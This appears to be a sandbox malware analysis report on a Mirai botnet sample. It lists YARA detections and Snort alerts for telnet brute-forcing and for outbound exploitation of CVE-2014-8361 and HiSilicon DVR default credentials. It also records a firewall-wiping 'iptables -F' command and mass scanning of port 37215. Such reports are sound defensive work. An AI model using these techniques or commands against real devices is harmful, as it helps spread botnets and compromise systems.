5241.1.00000000f6abff04.000000008642ee32.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5234.1.00000000f6abff04.000000008642ee32.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5249.1.00000000f6abff04.000000008642ee32.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5236.1.00000000f6abff04.000000008642ee32.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
5237.1.00000000f6abff04.000000008642ee32.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: arm7; ReversingLabs: Detection: 22%
Source: /usr/bin/pkill (PID: 5284); Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5289); Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5294); Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5403); Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5446); Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5568); Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:53370
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 65.61.91.118:23 -> 192.168.2.23:56886
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 65.61.91.118:23 -> 192.168.2.23:56886
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:49798
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:49798
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:50074
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:50074
Source: Traffic; Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50996 -> 156.224.178.167:52869
Source: Traffic; Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41418 -> 156.224.165.13:52869
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52732
Source: Traffic; Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:57200 -> 203.251.92.20:23
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52756
Source: Traffic; Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58178 -> 156.247.29.227:52869
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 123.20.222.131:23 -> 192.168.2.23:36414
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 123.20.222.131:23 -> 192.168.2.23:36414
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52794
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52834
Source: Traffic; Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33754 -> 156.238.44.215:52869
Source: Traffic; Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 217.78.28.18: -> 192.168.2.23:
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52860
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52882
Source: Traffic; Snort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:53864
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52926
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52970
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:52990
Source: Traffic; Snort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:53864
Source: Traffic; Snort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:38986
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53030
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:50264
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:50264
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53060
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:37176
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:37176
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53076
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53098
Source: Traffic; Snort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54094
Source: Traffic; Snort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:38986
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53172
Source: Traffic; Snort IDS: 1251 INFO TELNET Bad Login 65.61.91.118:23 -> 192.168.2.23:57594
Source: Traffic; Snort IDS: 718 INFO TELNET login incorrect 65.61.91.118:23 -> 192.168.2.23:57594
Source: Traffic; Snort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:36956
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53198
Source: Traffic; Snort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54094
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53220
Source: Traffic; Snort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39202
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53254
Source: Traffic; Snort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53284
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53304
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37122
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53322
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54306
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50834 -> 156.224.169.192:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48656 -> 156.224.166.208:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39202
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53354
              Source: TrafficSnort IDS: 716 INFO TELNET access 47.242.189.91:23 -> 192.168.2.23:41110
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53372
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:37500
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:37500
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54306
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53394
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 47.242.189.91:23 -> 192.168.2.23:41110
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:52616
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:52616
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39368
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53410
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55330 -> 156.241.13.128:52869
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53426
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56096 -> 156.226.12.36:52869
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53448
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:50788
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:50788
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37268
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54450
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53472
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39368
              Source: TrafficSnort IDS: 716 INFO TELNET access 222.243.211.18:23 -> 192.168.2.23:53502
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55584 -> 156.240.106.64:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54450
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39580
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41586 -> 156.232.95.208:52869
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:52836
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:52836
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:37754
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:37754
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54708
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39580
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34132 -> 156.224.191.36:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35096 -> 156.232.92.226:52869
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41234 -> 156.224.153.31:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54708
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37598
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39768
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 209.204.37.7:23 -> 192.168.2.23:57376
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 209.204.37.7:23 -> 192.168.2.23:57376
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54834
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43156 -> 156.224.169.218:52869
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 124.167.223.246:23 -> 192.168.2.23:39768
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 171.119.28.35:23 -> 192.168.2.23:37692
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:53112
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:53112
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54834
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.52.137:23 -> 192.168.2.23:38056
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.52.137:23 -> 192.168.2.23:38056
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.20.222.131:23 -> 192.168.2.23:37536
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.20.222.131:23 -> 192.168.2.23:37536
              Source: TrafficSnort IDS: 716 INFO TELNET access 124.167.223.246:23 -> 192.168.2.23:39894
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 123.21.111.201:23 -> 192.168.2.23:51250
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 123.21.111.201:23 -> 192.168.2.23:51250
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 218.173.79.111:23 -> 192.168.2.23:49508
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 218.173.79.111:23 -> 192.168.2.23:49508
              Source: TrafficSnort IDS: 716 INFO TELNET access 217.35.87.169:23 -> 192.168.2.23:49056
              Source: TrafficSnort IDS: 716 INFO TELNET access 43.230.20.243:23 -> 192.168.2.23:54968
              Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37348 -> 156.241.9.20:52869
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 65.61.91.118:23 -> 192.168.2.23:58492
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 65.61.91.118:23 -> 192.168.2.23:58492
              Source: TrafficSnort IDS: 492 INFO TELNET login failed 43.230.20.243:23 -> 192.168.2.23:54968
              Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 95.71.70.178:23 -> 192.168.2.23:53310
              Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 95.71.70.178:23 -> 192.168.2.23:53310
              Deletes all firewall rules
              Source: /bin/sh (PID: 5277) Args: iptables -F
              Connects to many ports of the same IP (likely port scanning)
              Source: global traffic TCP traffic: 41.133.193.5 ports 1,2,3,5,7,52869
              Source: global traffic TCP traffic: 197.148.92.15 ports 1,2,3,5,7,37215
              Uses known network protocols on non-standard ports
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.214.81.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.138.248.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.244.20.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.119.144.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.239.140.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.204.192.137:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.246.108.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.192.226.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.24.187.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.254.114.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.41.249.147:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.27.9.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.232.64.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.124.118.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.139.226.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.243.66.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.145.114.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.28.31.46:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.245.234.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.83.166.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.200.141.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.29.252.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.133.12.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.218.24.30:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.165.201.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.81.191.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.113.216.22:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.135.124.213:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.170.250.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.230.63.127:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.154.234.25:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.91.81.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.168.61.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.137.187.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.229.150.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.178.245.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.52.27.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.89.1.209:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.202.146.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.243.59.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.29.6.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.58.85.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.58.156.182:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.76.181.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.74.228.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.134.187.31:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.192.166.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.128.84.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.69.46.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.87.28.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.170.155.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.144.4.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.237.81.153:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.145.2.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.62.82.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.193.3.114:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.221.250.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.74.123.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.173.229.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.187.16.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.32.236.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.29.166.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.65.227.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.59.129.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.170.63.154:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.121.235.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.205.233.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.118.37.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.201.48.158:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.198.169.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.186.248.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.50.27.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.211.117.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.203.82.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.64.249.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.139.172.163:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.96.78.32:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.131.236.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.9.221.57:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.241.25.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.168.36.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.192.0.137:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.26.88.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.131.164.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.204.198.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.183.81.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.96.43.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.71.141.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.230.14.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.68.194.44:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.50.76.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.69.43.39:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.65.25.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.62.219.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.140.42.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.23.202.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.0.61.146:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.209.61.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.111.80.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.68.82.106:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.206.227.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 41.212.138.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 197.6.29.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:24197 -> 156.79.184.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.67.68.7:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.133.193.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.10.105.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.138.113.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.40.203.92:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.150.117.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.44.41.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.148.92.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.124.176.14:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.63.237.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.28.127.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.192.217.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.251.120.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.233.29.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.226.183.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.63.246.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.25.26.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.167.9.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.149.89.59:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.0.142.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.212.248.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.94.195.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.154.106.96:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.3.115.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.86.227.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.245.225.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.20.184.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.62.46.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.87.16.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.191.40.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.149.250.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.55.146.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.231.101.167:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.205.156.129:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.35.230.38:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.172.43.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.44.230.9:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.1.244.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.20.49.91:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.186.167.98:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.234.76.119:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.163.121.57:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.80.232.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.91.165.95:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.202.98.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.210.211.49:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.150.126.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.66.101.202:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.47.201.10:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.101.50.18:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.31.141.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.189.58.47:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.1.222.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.56.155.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.232.4.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.236.48.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.55.58.27:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.214.235.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.158.190.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.177.178.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.126.146.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.79.127.155:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.30.134.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.234.200.125:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.98.195.20:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.182.248.97:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.88.9.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.7.216.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.238.175.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.51.114.250:37215
